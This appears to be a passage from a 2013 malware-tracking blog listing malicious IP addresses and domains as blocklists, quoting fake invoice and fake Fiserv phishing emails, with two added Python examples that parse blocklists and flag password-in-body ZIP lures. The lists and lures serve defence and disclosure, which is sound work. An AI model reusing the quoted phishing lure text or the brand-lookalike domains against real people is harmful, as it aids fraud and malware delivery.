59.77.36.225 (CERNET, China)
59.124.33.215 (Chungwa Telecom, Taiwan)
59.126.142.186 (Chungwa Telecom, Taiwan)
59.160.69.74 (TATA Communications, India)
61.28.143.133 (ETPI, Philippines)
62.76.44.105 (IT House / Clodo-Cloud, Russia)
69.60.115.92 (Colopronto, US)
74.62.189.22 (Time Warner Cable, US)
74.93.56.83 (Comcast, US)
74.208.246.145 (1&1, US)
85.17.224.131 (Leaseweb, Netherlands)
85.119.187.145 (UniWeb, Belgium)
88.86.100.2 (Supernetwork / Castlegem, Czech Republic)
88.150.191.194 (Redstation, UK)
95.87.1.19 (Trakia Kabel OOD, Bulgaria)
95.111.32.249 (Mobitel EAD, Bulgaria)
108.170.32.179 (Secured Servers, US)
108.179.8.103 (Tyco / Cablevision, US)
109.123.125.68 (UK2.net, UK)
114.112.172.34 (Worldcom Teda Networks Technology, China)
119.92.209.120 (Makati IPG, Philippines)
120.124.132.123 (TANET, Taiwan)
121.83.197.179 (K-Opticom Corporation, Japan)
128.252.158.57 (Washington University, US)
138.80.14.27 (Charles Darwin University, Australia)
140.120.113.18 (TANET, Taiwan)
162.209.80.221 (Rackspace, US)
165.225.149.235 (Joyent, US)
166.78.183.28 (Rackspace, US)
172.245.16.47 (New Wave NetConnect / ColoCrossing, US)
172.255.106.126 (Nobis Technology Group, US)
182.72.216.173 (CusDelight Consultancy Services, India)
188.40.92.12 (Hetzner, Germany)
188.132.213.115 (Mars Global Datacenter Services, Turkey)
188.134.26.172 (Perspectiva Ltd, Russia)
189.15.96.61 (Companhia De Telecomunicacoes Do Brasil Central, Brazil)
190.85.249.159 (Telmex Colombia, Colombia)
190.238.107.240 (Telefonica del Peru, Peru)
192.95.54.119 (OVH, Canada)
192.241.205.26 (Digital Ocean, US)
195.225.58.122 (C&A Connect SRL, Romania)
198.61.213.12 (Rackspace, US)
198.98.102.165 (Enzu, US)
198.175.124.17 (DNSSLAVE.COM, US)
202.197.127.42 (Hunan Normal University, China)
203.236.232.42 (KINX, Korea)
208.69.42.50 (Bay Area Video Coalition, US)
208.115.114.68 (WOWRACK, US)
209.222.67.251 (Razor Inc, US)
210.200.0.95 (Asia Pacific On-line Services, Taiwan)
211.224.204.141 (KINX, Korea)
212.143.233.159 (013 Netvision Network, Israel)
217.64.107.108 (Society Of Mali's Telecommunications, Mali)

5.175.191.106
24.173.170.230
31.145.19.17
41.196.17.252
46.246.41.68
46.45.182.27
50.97.253.162
54.225.124.116
59.77.36.225
59.124.33.215
59.126.142.186
59.160.69.74
61.28.143.133
62.76.44.105
69.60.115.92
74.62.189.22
74.93.56.83
74.208.246.145
85.17.224.131
85.119.187.145
88.86.100.2
88.150.191.194
95.87.1.19
95.111.32.249
108.170.32.179
108.179.8.103
109.123.125.68
114.112.172.34
119.92.209.120
120.124.132.123
121.83.197.179
128.252.158.57
138.80.14.27
140.120.113.18
162.209.80.221
165.225.149.235
166.78.183.28
172.245.16.47
172.255.106.126
182.72.216.173
188.40.92.12
188.132.213.115
188.134.26.172
189.15.96.61
190.85.249.159
190.238.107.240
192.95.54.119
192.241.205.26
195.225.58.122
198.61.213.12
198.98.102.165
198.175.124.17
202.197.127.42
203.236.232.42
208.69.42.50
208.115.114.68
209.222.67.251
210.200.0.95
211.224.204.141
212.143.233.159
217.64.107.108
aa.com.reservation.viewfareruledetailsaccess.do.sai-uka-sai.com
abundanceguys.net
allgstat.ru
amimeseason.net
annot.pl
antidoctorpj.com
aqua-thermos.com
astarts.ru
auditbodies.net
aurakeep.net
autocompletiondel.net
autorize.net.models-and-kits.net
badstylecorps.com
basedbreakpark.su
beachfiretald.com
bebomsn.net
biati.net
blacklistsvignet.pl
blackragnarok.net
blindsay-law.net
bnamecorni.com
boats-sale.net
brasilmatics.net
buffalonyroofers.net
businessdocu.net
buty24-cool.com
buycushion.net
cbstechcorp.net
centow.ru
chairsantique.net
ciriengrozniyivdd.ru
cirormdnivneinted40.ru
clik-kids.com
condaleunvjdlp55.net
condalinarad72234652.ru
condalinaradushko5.ru
condalininneuwu36.net
condalinneuwu37.net
condalinneuwu5.ru
condalnua745746.ru
cooldeaflympics.com
cpa.state.tx.us.tax-returns.mattwaltererie.net
crossplatformcons.com
cryoroyal.net
datapadsinthi.net
doorandstoned.com
driversupdate.pw
dulethcentury.net
e-citystores.net
e-eleves.net
ehchernomorskihu.ru
ehnaisnwhgiuh29.net
ehnihenransivuennd.net
ehnihjrkenpj.ru
ehnihujasebejav15.ru
eliroots.ru
epackage.ups.com.shanghaiherald.net
ergopets.com
erminwanbuernantion20.net
ermitirationifyouwau30.net
estateandpropertty.com
etiquetteinsp.net
fastfragcheck.com
feminineperceiv.pl
fenvid.com
filmstripstyl.com
firefoxupd.pw
firerice.com
flashedglobetrot.pl
foremostorgand.su
foremostorgand.suc
fulty.net
gamnnbienwndd70.net
gcoordinatind.com
gebelikokulu.net
generationpasswaua40.net
genie-enterprises.com
germany.no-ip.biz
ghroumingoviede.ru
gnanosnugivnehu.ru
gondamtvibnejnepl.net
goodread.pl
greenleaf-investment.net
gromovieotvodidiejj40.net
handwrittenma.com
hdmltextvoice.net
heavygear.net
heidipinks.com
hemorelief.net
hiddenhacks.com
highsecure155.com
hingpressplay.net
homesforsaleftwaltonbea.com
hotkoyou.net
hotpubblici.com
housesales.pl
iberiti.com
icensol.net
independinsy.net
info-for-health.net
insectiore.net
irs.gov.tax-refunds.ach.treehouse-dreams.net
jonkrut.ru
kistrotilewest.su
klermont.net
klwines.com.order.complete.prysmm.net
kubiwaya.net
ledfordlawoffice.net
letsgofit.net
linguaape.net
linkedin.com-update-report.taltondark.net
links.emails.bmwusa.com.open.pagebuoy.net
locavoresfood.net
mackay-revealed.net
made-bali.net
magiklovsterd.net
marriott.com.reservation.lookup.motobrio.net
marriott.com.reservation.lookup.viperlair.net
metalcrew.net
microsoftnotification.net
mifiesta.ru
modshows.net
momotlawfirm.net
morphed.ru
mosher.pl
motobrio.net
mycanoweb.com
myfreecamgirls.net
mywebsitetips.net
neplohsec.com
nipslippage.net
nvufvwieg.com
onemessage.verizonwireless.com.verizonwirelessreports.com
ontria.ru
organizerrescui.pl
outbounduk.net
oydahrenlitu346357.ru
package.ups.com.shanghaiherald.net
pagebuoy.net
pass-hc.com
peertag.com
playtimepixelating.su
pool-inter.com
porschetr-ml.com
potteryconvention.ru
privat-tor-service.com
prothericsplk.com
prysmm.net
quipbox.com
ratenames.net
relectsdispla.net
rentipod.ru
restless.su
saberig.net
safebrowse.pw
sai-uka-sai.com
sartorilaw.net
scourswarriors.su
secureaction120.com
securednshooki.com
sendkick.com
sensetegej100.com
seodirect-proxy.com
shanghaiherald.net
sludgekeychai.net
soberimages.com
susubaby.net
tagcentriccent.net
tagcentriccent.pl
tax-returns.gov.cpa.state.us.gebelikokulu.net
teakfromafrica.net
techno5room.ru
thegalaxyatwork.com
thosetemperat.net
tor-connect-secure.com
treehouse-dreams.net
tvblips.net
twitter.com.greenleaf-investment.net
u-janusa.net
ukbash.ru
usergateproxy.net
verizonwirelessreports.com
viperlair.net
vip-proxy-to-tor.com
vitans.net
vivendacalangute.net
wic-office.com
wordstudio.pl
wow-included.com
zestrecommend.com

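Two things in the post above lend themselves to a script: the annotated "IP (provider, country)" block has to be turned into the plain copy-and-paste list, and a number of the hostnames lead with somebody else's brand (irs.gov.tax-refunds.ach.treehouse-dreams.net, linkedin.com-update-report.taltondark.net, onemessage.verizonwireless.com.verizonwirelessreports.com) so that the start of the URL looks legitimate while the registrable domain is the attacker's. The Python below is an added example, not the blog's own tooling. SAMPLE is a handful of lines copied from this post; the regular expressions and the BRANDS table are assumptions made for the example.

```python
"""Turn a 'Malware sites to block' post into a clean blocklist and flag
hostnames that lead with somebody else's brand.

Added example, not the blog's own tooling. SAMPLE is copied from the post
above; the regexes and the BRANDS table are assumptions for this example.
"""
import ipaddress
import re

# Annotated form used at the top of each post: "5.175.191.106 (GHOSTnet, Germany)"
ANNOTATED = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s*\(([^,()]+),\s*([^()]+)\)$")
HOSTNAME = re.compile(r"[a-z0-9-]+(?:\.[a-z0-9-]+)+\.?")

# Brands used as decoy labels in the list (assumption: hand-picked for the
# example; a real deployment would load a much larger list).
BRANDS = {"aa.com", "irs.gov", "ups.com", "marriott.com", "linkedin.com",
          "twitter.com", "amazon.com", "americanexpress.com", "pinterest.com",
          "verizonwireless.com", "bmwusa.com", "klwines.com"}


def parse_blocklist(text):
    """Return ({ip: (provider, country) or None}, sorted hostnames).

    Annotated and bare IPs are merged on the address; anything that is
    neither an IPv4 address nor a hostname (dates, headings) is skipped.
    """
    ips, hosts = {}, set()
    for raw in text.splitlines():
        line = raw.strip()
        m = ANNOTATED.match(line)
        if m:
            try:
                ipaddress.IPv4Address(m.group(1))  # rejects 999.1.1.1 and friends
            except ipaddress.AddressValueError:
                continue
            ips[m.group(1)] = (m.group(2).strip(), m.group(3).strip())
            continue
        try:
            ipaddress.IPv4Address(line)
        except ipaddress.AddressValueError:
            if HOSTNAME.fullmatch(line.lower()):
                hosts.add(line.lower().rstrip("."))
            continue
        ips.setdefault(line, None)  # keep an annotation already recorded
    return ips, sorted(hosts)


def impersonated_brand(hostname):
    """Return the brand a hostname masquerades as, or None if it is clean.

    'irs.gov.tax-refunds.ach.treehouse-dreams.net' carries irs.gov as its
    leading labels but is registered under treehouse-dreams.net, and
    'linkedin.com-update-report.taltondark.net' glues the brand to a hyphen.
    """
    h = hostname.lower().rstrip(".")
    if any(h == b or h.endswith("." + b) for b in BRANDS):
        return None  # genuinely inside the brand's own zone
    for brand in sorted(BRANDS):
        # The brand must sit on a label boundary and be followed by '.' or '-'.
        if re.search(r"(?:^|\.)" + re.escape(brand) + r"(?=[.-])", h):
            return brand
    return None


def plain_list(ips, hosts):
    """Copy-and-paste form used at the end of each post: IPs in numeric
    (not string) order, then hostnames alphabetically."""
    return sorted(ips, key=ipaddress.IPv4Address) + list(hosts)


# Constructed from lines in the post above.
SAMPLE = """\
5.175.191.106 (GHOSTnet, Germany)
74.208.246.145 (1&1, US)
217.64.107.108 (Society Of Mali's Telecommunications, Mali)
5.175.191.106
74.208.246.145
217.64.107.108
abundanceguys.net
irs.gov.tax-refunds.ach.treehouse-dreams.net
linkedin.com-update-report.taltondark.net
onemessage.verizonwireless.com.verizonwirelessreports.com
treehouse-dreams.net
"""

if __name__ == "__main__":
    ips, hosts = parse_blocklist(SAMPLE)
    for h in hosts:
        brand = impersonated_brand(h)
        if brand:
            print(f"lookalike of {brand}: {h}")
    print("\n".join(plain_list(ips, hosts)))
```

Note that a string sort would put 217.64.107.108 before 5.175.191.106; sorting on the parsed address keeps the list in the octet order the posts use. The brand check deliberately tolerates the hyphen-joined form, which a naive "brand followed by a dot" rule misses.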
Thursday, 11 July 2013

Malware sites to block 11/7/13

I noticed 188.138.89.106 (Intergenia AG, Germany) was the originating IP being used in this spam run using a hijacked 1&1 account, and VirusTotal thinks that the server is pretty darned evil. A quick poke at this box shows that it has a number of multihomed malicious and C&C domains.

Looking at some of these servers, I'm suspicious that they may have been compromised using a Plesk vulnerability. Various domains are used for botnets, including some Bitcoin miners. There may be some formerly legitimate domains in this mix, but given the compromised nature of the servers I would not trust them.

37.123.112.147 (UK2.NET, UK)
37.123.113.7 (UK2.NET, UK)
68.169.38.143 (Westhost Inc, US)
68.169.42.177 (Westhost Inc, US)
74.208.133.134 (1&1, US)
85.25.86.198 (Intergenia AG, Germany)
109.123.95.8 (UK2.NET, UK)
188.138.89.106 (Intergenia AG, Germany)
212.53.167.13 (FASTCOM IP Net, Poland)
212.227.53.20 (1&1, Germany)
212.227.252.92 (1&1, Germany)
213.165.71.238 (1&1, Germany)
217.160.173.154 (1&1, Germany)

Recommended blocklist:
37.123.112.147
37.123.113.7
68.169.38.143
68.169.42.177
74.208.133.134
85.25.86.198
109.123.95.8
188.138.89.106
212.53.167.13
212.227.53.20
212.227.252.92
213.165.71.238
217.160.173.154
bayrische-kampfplantage.de
f.eastmoon.pl
final.toles.org
final.twiaci.com
fujimoto-group.jp
gigasbh.org
gigasphere.su
jobs.4zox.com
ks-reifenservice.de
mh-wellnesscoach.de
mikimouse.net
move-aube.fr
naturalcuresdoc.com
naturalcuresdocanswers.com
newbigjob.de
p15114714.pureserver.info
s.richlab.pl
secure.redirectsite.net
soulvampire-ice.de
streetdanceroom.de
tests.gigasbh.org
toles.org
treibholzundmeer.de
try.aktivoxigen.com
wireless-work.su
xixbh.com
xixbh.net
xray868.server4you.de
xxxxxxxxxxxxxxx.kei.su

"WTX Media INC" spam / dajizzum.com

This fake invoice spam from the nonexistent "WTX Media" leads to a malware landing page on dajizzum.com:

From: Rebecca Media [mailto:support@rebeccacella.com]
Sent: 11 July 2013 07:46
To: [redacted]
Subject: Subscription Details

We hereby inform you that your subscription has been activated, your login information is as follows:

Username: IX9322130
Password: X#(@kIE04N
Login Key: 839384

Please do not share the login information with anyone as this account is only for your use, sharing the account will result in account termination without a refund.
The credit card on file submited by you will be billed within 24 hours, in the amount of 499.00 GBP, amount equal to one year unlimited subscription.
Your bank statement will show up as being billed by "WTX Media INC".

If you have any questions or issues with your login as well as requests to upgrade or cancel your membership please contact us using the form at:

[donotclick]www.rebeccacella.com/wp-content/plugins/subscribe/


Any feedback is appreciated as we strive to improve our services constantly.
WTX Media Team
The link in the email goes through a legitimate but hacked website (rebeccacella.com) and lands on a malware landing page at [donotclick]dajizzum.com/team/administration/admin4_colon/fedora.php?view=44 (report here) which contains an exploit kit.

dajizzum.com is hosted on 109.123.100.219 (UK2.NET, UK) which appears to be a hijacked server. At the moment I can only see that one site hosted on this box, but blacklisting the IP as a precaution may be wise.

The spam originates from another malware server on 188.138.89.106 (more on this later), but it appears to use a compromised 1&1 account, as the spamvertised domain, the sender's address and the SMTP relay at 212.227.29.10 all belong to that provider.

Tuesday, 9 July 2013

Malware sites to block 9/7/13

These are the current IPs and domains that appear to be in use by this gang. IPs are listed with hosting companies and countries first, and then a plain list of IPs and domains for copy-and-pasting:

5.135.198.41 (OVH, France)
14.63.198.119 (Korea Telecom, Korea)
24.173.170.230 (Time Warner Cable, US)
46.14.182.109 (Swisscom, Switzerland)
46.45.182.27 (Radore Veri Merkezi Hizmetleri, Turkey)
54.232.86.91 (Amazon AWS, Brazil)
59.124.33.215 (Chungwa Telecom, Taiwan)
62.165.254.220 (Tvnetwork, Hungary)
62.169.58.22 (Phoenix Informatica, Italy)
64.49.246.226 (Rackspace, US)
69.162.76.10 (Limestone Networks, US)
74.63.195.131 (Limestone Networks, US)
74.93.56.83 (Comcast Communications, US)
77.240.118.69 (Acens Technologies, Spain)
78.108.86.169 (Majordomo LLC, Russia)
80.52.135.172 (Telekomunikacja Polska, Poland)
80.218.115.92 (Cablecom, Switzerland)
82.79.4.33 (RCS & RDS Business, Romania)
82.165.41.13 (1&1 Internet, Philippines)
89.45.83.92 (Nlink SRL, Romania)
89.93.219.156 (Bouygues Telecom, France)
89.96.141.43 (IPS SRL, Italy)
89.248.161.137 (Ecatel, Netherlands)
89.248.161.146 (Ecatel, Netherlands)
95.111.32.249 (Mobitel, Bulgaria)
95.173.187.8 (Netinternet Bilgisayar Telekominukasyo, Turkey)
97.79.214.75 (Time Warner Cable, US)
103.9.23.34 (TPL Trakker Ltd, Pakistan)
109.169.86.196 (iomart / ThrustVPS, UK)
109.234.84.213 (Servicleop, Spain)
113.161.207.101 (VNPT, Vietnam)
115.28.45.30 (HiChina Web Solutions / Alibaba, China)
115.146.93.25 (Nectar Research Cloud, Australia)
116.251.213.12 (OneAsiaHost, Singapore)
117.102.102.170 (Servo Buana Resources, Indonesia)
117.239.224.145 (ZAD Institute, India)
123.30.50.245 (VNPT, Vietnam)
129.64.95.45 (Brandeis University, US)
134.159.143.12 (Telstra-Telewhite, Hong Kong)
138.80.14.27 (Charles Darwin University, Australia)
143.239.87.38 (University College Cork, Ireland)
151.155.25.111 (Novell Inc, US)
172.246.122.111 (Enzu Inc, US)
173.167.54.139 (Iceweb Storage Corp, US)
173.245.7.158 (Leland Private Systems, US)
177.87.104.21 (Alberto Torres Barreto, Brazil)
181.54.174.204 (Telmex Colombia, Colombia)
184.22.36.4 (HostNOC, US)
184.105.135.29 (Hurricane Electric, US)
186.227.53.43 (Via Cabo Provedor de Internet e Informática Ltda, Brazil)
189.84.25.188 (DataCorpore Serviços e Representações, Brazil)
190.85.249.159 (Telmex Colombia, Colombia)
190.238.107.240 (TDP ERX, Peru)
192.210.205.208 (New Wave Netconnect / Colocrossing, US)
193.242.126.78 (Lemminkainen Oyj, Finland)
195.241.208.160 (Telfort / Tiscali / KPN, Netherlands)
198.46.131.100 (New Wave Netconnect / Colocrossing, US)
198.50.136.166 (OVH, Brazil)
198.175.124.17 (DNSSLAVE.COM, US)
198.199.70.149 (Digital Ocean, US)
199.233.234.83 (Nodedeploy, US)
202.28.69.195 (UniNet, Thailand)
202.56.170.28 (Ningnet, Indonesia)
203.235.181.181 (GNGAS Enterprise Networks, Korea)
207.254.1.17 (Virtacore Systems, US)
210.200.0.95 (Asia Pacific On-line Services Inc, Taiwan)
213.56.125.97 (OBS, France)
222.20.90.25 (HuaZhong University of Science and Technology, China)

5.135.198.41
14.63.198.119
24.173.170.230
46.14.182.109
46.45.182.27
54.232.86.91
59.124.33.215
62.165.254.220
62.169.58.22
64.49.246.226
69.162.76.10
74.63.195.131
74.93.56.83
77.240.118.69
78.108.86.169
80.52.135.172
80.218.115.92
82.79.4.33
82.165.41.13
89.45.83.92
89.93.219.156
89.96.141.43
89.248.161.137
89.248.161.146
95.111.32.249
95.173.187.8
97.79.214.75
103.9.23.34
109.169.86.196
109.234.84.213
113.161.207.101
115.28.45.30
115.146.93.25
116.251.213.12
117.102.102.170
117.239.224.145
123.30.50.245
129.64.95.45
134.159.143.12
138.80.14.27
143.239.87.38
151.155.25.111
172.246.122.111
173.167.54.139
173.245.7.158
177.87.104.21
181.54.174.204
184.22.36.4
184.105.135.29
186.227.53.43
189.84.25.188
190.85.249.159
190.238.107.240
192.210.205.208
193.242.126.78
195.241.208.160
198.46.131.100
198.50.136.166
198.175.124.17
198.199.70.149
199.233.234.83
202.28.69.195
202.56.170.28
203.235.181.181
207.254.1.17
210.200.0.95
213.56.125.97
222.20.90.25
101ndstreetymha.com
afabind.com
amazon.com.first4supplies.net
americanexpress.com.krasalco.com
andertiua200.com
androv.pl
aniolyfarmacij.com
astarts.ru
auditbodies.net
beachfiretald.com
beatenunwield.com
bebomsn.net
beirutyinfo.com
blacklistsvignet.pl
bnamecorni.com
boats-sale.net
brandeddepend.com
buycushion.net
cardpalooza.su
centow.ru
centsvisualcaf.net
chairsantique.net
chrismortonlaw.net
ciriengrozniyivdd.ru
cirienkoidrugied50.ru
cirormdnivneinted40.ru
cocainism.net
collegialwar.com
com.amazon.com.first4supplies.net
condalinarad72234652.ru
condalinaradushko5.ru
condalinneuwu5.ru
condalinrwgw136.ru
condalnua745746.ru
datapadsinthi.net
delines.ru
dirvers.net
doorandstoned.com
driversupdate.pw
editionscode.com
ehchernomorskihu.ru
ehnaisnwhgiuh29.net
ehnihjrkenpj.ru
ehnihujasebejav15.ru
enchantingfluid.com
enuhhdijsnenbude40.ru
ergopets.com
feminineperceiv.pl
filmstripstyl.com
fincal.pl
firefoxupd.pw
first4supplies.net
freakable.net
fulty.net
gamnnbienwndd70.net
gatorovnskeinbueed60.ru
genie-enterprises.com
gerlos-hotel.net
getstatsp.ru
ghroumingoviede.ru
gnanisienviwjunlp.ru
gnanosnugivnehu.ru
grivnichesvkisejj50.ru
hdmltextvoice.net
heidipinks.com
hexactos.com
hingpressplay.net
hospitalinstitutee.com
hotkoyou.net
independinsy.net
infostarter.net
initiationtune.su
insectiore.net
joinproportio.com
jonkrut.ru
letsgofit.net
lexus-lfa.net
libulionstreet.su
lifeline-tv.net
lifestylelbinfo.com
linefisher.com
liocolostrum.net
magiklovsterd.net
mail1.infostarter.net
modshows.net
mychildrenss.com
ns1.infostarter.net
nvufvwieg.com
organizerrescui.pl
oydahrenlitu346357.ru
patrihotel.net
paynotice07.net
pinterest.com.reports0701.net
porschetr-ml.com
potteryconvention.ru
privat-tor-service.com
przcloud.com
quipbox.com
recatalogfinger.net
relationshipa.com
relectsdispla.net
rentipod.ru
reports0701.net
reveck.com
salesplaytime.net
sartorilaw.net
secrettapess.com
securednshooki.com
sendkick.com
smartsecurity-app.com
soberimages.com
spros.pl
streetgreenlj.com
susubaby.net
syncbinderanalog.net
tagcentriccent.net
tagcentriccent.pl
telecomerra.com
tor-connect-secure.com
transplantee.net
tstatbox.ru
ukbash.ru
usenet4ever.net
utraining.us
vahvahchicas.ru
ventstandart.net
vip-proxy-to-tor.com
voippromotion.su
webhelphighestp.net
wic-office.com
widnows.net
winodwsupd.pw
wow-included.com
zestrecommend.com

Tuesday, 16 April 2013

"Fiserv Secure Email Notification" spam

This spam has an encrypted ZIP file attached that contains malware. The passwords and filenames will vary.


From: Fiserv Secure Notification [mailto:secure.notification@fiserv.com]
Sent: Tue 16/04/2013 14:02
Subject: [WARNING : MESSAGE ENCRYPTED] Fiserv Secure Email Notification - CC3DK9WJW8IG0F5


You have received a secure message

Read your secure message by opening the attachment, Case_CC3DK9WJW8IG0F5.zip.

The attached file contains the encrypted message that you have received.

To decrypt the message use the following password -  KsUs3Z921mA

To read the encrypted message, complete the following steps:

 -  Double-click the encrypted message file attachment to download the file to your computer.
 -  Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
 -  The message is password-protected, enter your password to open it.

To access from a mobile device, forward this message to mobile@res.fiserv.com to receive a mobile login URL.

If you have concerns about the validity of this message, please contact the sender directly. For questions about secure e-mail encryption service, please contact technical support at 888.979.7673.

2000-2013 Fiserv Secure Systems, Inc. All rights reserved.

In the case of the sample I have seen, there is an attachment Case_CC3DK9WJW8IG0F5.zip which unzips using the supplied password to Case_Fiserv_04162013.exe (note the date is encoded into the filename).

At the time of writing, VirusTotal results are just 5/46. The Comodo CAMAS report is here, the ThreatExpert report here and the ThreatTrack sandbox report can be downloaded from here (this is the most detailed one). This seems to be a Zbot variant.
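
The lure here has three tells that a mail filter can check without ever running the payload: the decryption password is printed in the same message as the encrypted archive, the archive holds an executable, and the executable's name carries the day's date (Case_Fiserv_04162013.exe for a mail sent 16/04/2013). The Python below is an added example of those checks, not the blog's own analysis tooling. SAMPLE_BODY is constructed from the message quoted above; the ZIP is built in memory as an unencrypted stand-in (the standard library cannot write ZipCrypto archives), so the encryption flag is reported but reads False for it.

```python
"""Heuristics for the lure above: an encrypted ZIP whose password is printed
in the same message, carrying an executable with the run date in its name.

Added example, not the blog post's own tooling. SAMPLE_BODY is constructed
from the quoted e-mail; build_sample_zip() produces a harmless stand-in.
"""
import io
import re
import zipfile

PASSWORD_RE = re.compile(r"use the following password\s*[-:]\s*(\S+)", re.I)
ATTACHMENT_RE = re.compile(r"opening the attachment,\s*([\w.\-]+\.zip)", re.I)
SENT_RE = re.compile(r"^Sent:\s*(?:\w+\s+)?(\d{2})/(\d{2})/(\d{4})", re.I | re.M)
EXECUTABLE_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".jar")


def lure_indicators(body):
    """Archive name and in-band password, as the lure itself states them."""
    pw, att = PASSWORD_RE.search(body), ATTACHMENT_RE.search(body)
    return {"password": pw.group(1) if pw else None,
            "attachment": att.group(1) if att else None}


def inspect_zip(data):
    """Member names and flags without extracting anything. ZipCrypto only
    encrypts file data, so names and the encryption flag (general purpose
    bit 0) are readable from the central directory without the password."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        return {
            "members": [i.filename for i in infos],
            "encrypted": any(i.flag_bits & 0x1 for i in infos),
            "executables": [i.filename for i in infos
                            if i.filename.lower().endswith(EXECUTABLE_EXT)],
        }


def filename_encodes_sent_date(member, body):
    """True if the member name carries the mail's date as MMDDYYYY, the
    pattern noted for Case_Fiserv_04162013.exe (Sent: 16/04/2013)."""
    m = SENT_RE.search(body)
    if not m:
        return False
    day, month, year = m.groups()
    return (month + day + year) in re.findall(r"\d{8}", member)


def verdict(body, zip_data):
    """'block' for password-in-body plus an executable member, 'quarantine'
    for password-in-body plus an encrypted archive whose contents cannot be
    inspected further, otherwise 'allow'."""
    ind, z = lure_indicators(body), inspect_zip(zip_data)
    if ind["password"] and z["executables"]:
        return "block"
    if ind["password"] and z["encrypted"]:
        return "quarantine"
    return "allow"


def build_sample_zip(member="Case_Fiserv_04162013.exe"):
    """Constructed stand-in for the attachment: a harmless stub, not malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member, b"MZ" + b"\x00" * 64)
    return buf.getvalue()


# Constructed from the message quoted above.
SAMPLE_BODY = """\
Sent: Tue 16/04/2013 14:02
Subject: [WARNING : MESSAGE ENCRYPTED] Fiserv Secure Email Notification - CC3DK9WJW8IG0F5

Read your secure message by opening the attachment, Case_CC3DK9WJW8IG0F5.zip.

To decrypt the message use the following password -  KsUs3Z921mA
"""

if __name__ == "__main__":
    sample = build_sample_zip()
    print(lure_indicators(SAMPLE_BODY), inspect_zip(sample))
    print(filename_encodes_sent_date("Case_Fiserv_04162013.exe", SAMPLE_BODY))
    print(verdict(SAMPLE_BODY, sample))
```

The point of the encryption is to keep the attachment out of reach of gateway AV; the member list is not encrypted, so the executable extension is still visible, and a message that hands the recipient the password to its own attachment is itself a strong signal.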


The bad IPs involved are:
50.116.15.209 (Linode, US)
62.103.27.242 (OTEnet, Greece)
78.139.187.6 (Caucasus Online Ltd, Georgia)
87.106.3.129 (1&1, Germany)
108.94.154.77 (AT&T, US)
117.212.83.248 (BSNL Internet, India)
120.61.212.73 (MTNL, India)
122.165.219.71 (ABTS Tamilnadu, India)
123.237.187.126 (Reliance Communications, India)
176.73.145.22 (Caucasus Online Ltd, Georgia)
186.134.148.36 (Telefonica de Argentina, Argentina)
190.39.197.150 (CANTV Servicios, Venezuela)
195.77.194.130 (Telefonica, Spain)
199.59.157.124 (Kyvon, US)
201.211.224.46 (CANTV Servicios, Venezuela)
212.58.4.13 (Doruknet, Turkey)

Recommended blocklist:
korbi.va-techniker.de
mail.yaklasim.com
phdsurvey.org
vbzmiami.com
user1557864.sites.myregisteredsite.com
50.116.15.209
62.103.27.242
78.139.187.6
87.106.3.129
108.94.154.77
117.212.83.248
120.61.212.73
122.165.219.71
123.237.187.126
176.73.145.22
186.134.148.36
190.39.197.150
195.77.194.130
199.59.157.124
201.211.224.46
212.58.4.13